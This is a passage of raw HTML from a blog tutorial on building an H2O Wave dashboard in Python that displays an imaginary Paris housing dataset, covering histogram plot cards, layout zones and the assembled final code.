&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_histograms&lt;/span&gt;(q:Q, df, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;section_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Plots of the data&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column_names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[index]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; colum_names:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df[name]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_histogram(q, values, name)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The next step is to make a histogram plot, which we will define inside &lt;code&gt;show_histogram()&lt;/code&gt;. We can use &lt;code&gt;ui.plot_card()&lt;/code&gt; to create a histogram. Using the same trick as we have previously, we use &lt;code&gt;ui.box()&lt;/code&gt; to define the zone to display our histogram and the width of the card. We use the &lt;code&gt;data&lt;/code&gt; argument to pass in the output from &lt;code&gt;make_histogram_data()&lt;/code&gt; with the &lt;code&gt;data()&lt;/code&gt; function. Inside &lt;code&gt;data()&lt;/code&gt;, we use the &lt;code&gt;fields&lt;/code&gt; argument to name the columns of our data, and &lt;code&gt;make_histogram_data()&lt;/code&gt; to define the &lt;code&gt;rows&lt;/code&gt; of the data, where each row is &lt;code&gt;[division, count]&lt;/code&gt;. Finally, we use the &lt;code&gt;plot&lt;/code&gt; argument to specify our plot using &lt;code&gt;ui.plot()&lt;/code&gt;. When looking at the &lt;a href="https://wave.h2o.ai/docs/api/ui#plot" rel="external"&gt;documentation&lt;/a&gt; for &lt;code&gt;ui.plot()&lt;/code&gt; we can see it expects one argument, &lt;code&gt;mark&lt;/code&gt;, which expects a list object with class &lt;code&gt;Mark&lt;/code&gt;. To do this we use &lt;code&gt;ui.mark()&lt;/code&gt;. Inside &lt;code&gt;ui.mark()&lt;/code&gt; we define the plot type, what variable to use, along with various other options you have in a typical plotting function. For us to produce a histogram we must pass &lt;code&gt;type='interval'&lt;/code&gt;, and give &lt;code&gt;division&lt;/code&gt; and &lt;code&gt;count&lt;/code&gt; defined in &lt;code&gt;data()&lt;/code&gt; to the &lt;code&gt;x&lt;/code&gt; and &lt;code&gt;y&lt;/code&gt; arguments. Note that we need to pass &lt;code&gt;x='=X'&lt;/code&gt;, instead of &lt;code&gt;x=X&lt;/code&gt; or &lt;code&gt;x='X'&lt;/code&gt;. To tidy the plot up we also pass &lt;code&gt;ymin=0&lt;/code&gt; to stop the histogram producing a negative y axis and also pass in some labels for the x and y axes with &lt;code&gt;x_title&lt;/code&gt; and &lt;code&gt;y_title&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To produce multiple histograms we use the same trick that we used when creating the stats cards by letting the page name vary in &lt;code&gt;show_histogram()&lt;/code&gt;. This means when we create &lt;code&gt;show_histograms()&lt;/code&gt; all we need to do is simply iterate &lt;code&gt;show_histogram()&lt;/code&gt; over different column names with the relevant data and we will produce multiple histograms on our Wave app. We also add another section header into &lt;code&gt;show_histograms()&lt;/code&gt; to give a heading to our histograms.&lt;/p&gt;
&lt;p&gt;Next we need to update &lt;code&gt;apply_layout()&lt;/code&gt; to define where the plot cards and section card will be placed. Similar to the &lt;code&gt;'top'&lt;/code&gt; zone, we again use the &lt;code&gt;direction&lt;/code&gt; argument to specify the layout direction to be a row. i.e. we want to space the cards horizontally. We simply need to add two extra zones within our content zone labelled &lt;code&gt;section2&lt;/code&gt; and &lt;code&gt;bottom&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;apply_layout&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;meta&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;meta_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;, theme&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;nord&amp;#39;&lt;/span&gt;, layouts&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; breakpoint&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;xl&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;1600px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;body&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW, zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;content&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;COLUMN, zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;300px&amp;#39;&lt;/span&gt;, direction &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;bottom&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then finally, we add &lt;code&gt;show_histograms()&lt;/code&gt; to &lt;code&gt;server()&lt;/code&gt; so the histograms will appear in the browser.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sever&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply_layout(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_homepage(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_table(q, df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_multiple_stats_cards(q, df, index &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_histograms(q, df, index &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, you should see something very similar to the picture below in your browser.&lt;/p&gt;
&lt;p&gt;&lt;img alt="The final version of the Wave app displayed in the browser." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/final_app.png" width="1848"&gt;&lt;/p&gt;
&lt;h2 id="the-final-code"&gt;The final code&lt;/h2&gt;
&lt;p&gt;Finally, here is the code in full that we have just produced above, hopefully your code should look very similar!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;h2o_wave&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Q, ui, app, main, data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#39;ParisHousing.csv&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;values&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;variable_names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/displayData&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sever&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply_layout(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_homepage(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_table(q, df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_multiple_stats_cards(q, df, index &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_histograms(q, df, index &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_homepage&lt;/span&gt;(q:Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;header_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;, width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;100%&amp;#39;&lt;/span&gt;, height&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;86px&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; icon&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Money&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; icon_color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Black&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Paris Housing Market&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;This is an imaginary housing dataset&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;footer_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; caption&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;This dataset was obtained from [Kaggle](https://www.kaggle.com/datasets/mssmartypants/paris-housing-price-prediction)&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;apply_layout&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;meta&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;meta_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;, theme&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;nord&amp;#39;&lt;/span&gt;, layouts&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; breakpoint&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;xl&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;1600px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;body&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW, zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;content&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;COLUMN, zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;300px&amp;#39;&lt;/span&gt;, direction &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;bottom&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
